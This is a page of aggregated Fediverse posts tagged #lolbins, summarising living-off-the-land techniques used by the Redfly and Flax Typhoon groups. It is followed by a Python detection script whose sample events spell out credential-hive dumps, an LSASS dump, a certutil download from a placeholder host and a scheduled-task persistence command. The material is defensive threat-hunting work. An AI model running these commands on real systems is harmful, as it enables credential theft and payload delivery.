home.social

#lolbins — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #lolbins, aggregated by home.social.

  1. Was looking for a good Awesome list on Living Off the Land (#LOL #LOtL) tools/techniques. Found some helpful sites/repos, but either there was nothing I could contribute to or it was limited.

    So... I made one: github.com/danzek/awesome-lol-

    Contributions welcome, whether by replying to this post or sending a PR on GitHub.

    #lolbins #lolbas

  2. Did you know that the finger command can be used for data exfil? We recently had an incident where this type of activity was found.

    huntress.com/blog/cant-touch-t

    #DFIR #lolbins #lolbas #exfil #mchammer #CTI #cybersecurity
    @keydet89

  3. The Symantec research team uncovered an espionage campaign from the #APT group they track as #Redfly. The group used multiple tools during the campaign, which included the #ShadowPad trojan, #Packerloader, and a keylogger. They also abused some #LOLBINs to achieve their goals.

    Redfly masqueraded ShadowPad in a "VMware" directory and gained persistence by creating a service that ran the malware once the computer started; the keylogger stored its captured keystrokes in a directory that included "Intel" in the path. The APT group used reg.exe to dump credentials from the SYSTEM, SAM, and SECURITY hives. They also used a renamed version of ProcDump to dump credentials from LSASS. PowerShell was also used to gather information on the storage devices attached to the system, and finally a scheduled task was created to perform side-loading and lateral movement. #HappyHunting!

    #CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

  4. Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and the Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but also gives any organization a starting point for threat hunting using the technical details provided! Enjoy your weekend and #HappyHunting!

    #CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday
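The LOLBin TTPs called out in posts 3 and 4 (reg.exe hive dumps, a renamed ProcDump reading LSASS, certutil/bitsadmin downloads, scheduled-task creation) map directly onto process-creation telemetry. The following is an added detection example, not code from either post or vendor; the events are constructed Sysmon-style records, `orig` stands in for Sysmon's OriginalFileName field, and the hostname and file names are placeholders.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (not real telemetry).
# "orig" stands in for the OriginalFileName field Sysmon reads from the PE header;
# the value "procdump" for the renamed tool is a constructed sample.
EVENTS = [
    {"image": r"C:\Windows\System32\reg.exe", "orig": "reg.exe",
     "cmd": r"reg.exe save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"image": r"C:\Windows\System32\reg.exe", "orig": "reg.exe",
     "cmd": r"reg  save HKLM\SYSTEM C:\Windows\Temp\sys.hiv"},
    {"image": r"C:\ProgramData\Intel\svc.exe", "orig": "procdump",
     "cmd": r"svc.exe -accepteula -ma lsass.exe C:\ProgramData\Intel\out.dmp"},
    {"image": r"C:\Windows\System32\certutil.exe", "orig": "CertUtil.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://example.invalid/t.exe t.exe"},
    {"image": r"C:\Windows\System32\schtasks.exe", "orig": "schtasks.exe",
     "cmd": r'schtasks /create /tn "Updater" /tr C:\ProgramData\VMware\vm.exe /sc onstart'},
    {"image": r"C:\Windows\System32\reg.exe", "orig": "reg.exe",
     "cmd": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},  # benign
]

# Command-line rules keyed to the TTPs named in the posts (matched case-insensitively).
CMD_RULES = [
    ("reg.exe registry hive dump",
     r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?:sam|system|security)\b"),
    ("certutil download", r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b"),
    ("bitsadmin download", r"\bbitsadmin(?:\.exe)?\b.*\s/transfer\b"),
    ("scheduled task creation", r"\bschtasks(?:\.exe)?\s+/create\b"),
    ("LSASS dump arguments", r"\s-ma\s+lsass(?:\.exe)?\b"),
]

def stem(name):
    """File name without directory or extension, lower-cased, for comparisons."""
    return PureWindowsPath(name).stem.lower()

def detect(events):
    """Return (rule_name, command_line) for every event that trips a rule."""
    hits = []
    for ev in events:
        cmd = ev["cmd"].lower()
        for name, pattern in CMD_RULES:
            if re.search(pattern, cmd):
                hits.append((name, ev["cmd"]))
        # Renamed tool: the name embedded in the PE differs from the name on disk,
        # which is how a renamed ProcDump stands out even when the command line is quiet.
        if ev["orig"] and stem(ev["orig"]) != stem(ev["image"]):
            hits.append(("renamed binary (OriginalFileName mismatch)", ev["cmd"]))
    return hits

if __name__ == "__main__":
    for rule, cmd in detect(EVENTS):
        print(f"[{rule}] {cmd}")
```

The benign `reg query` event produces no hit, while the renamed ProcDump event is flagged twice: once on its `-ma lsass` arguments and once on the name mismatch.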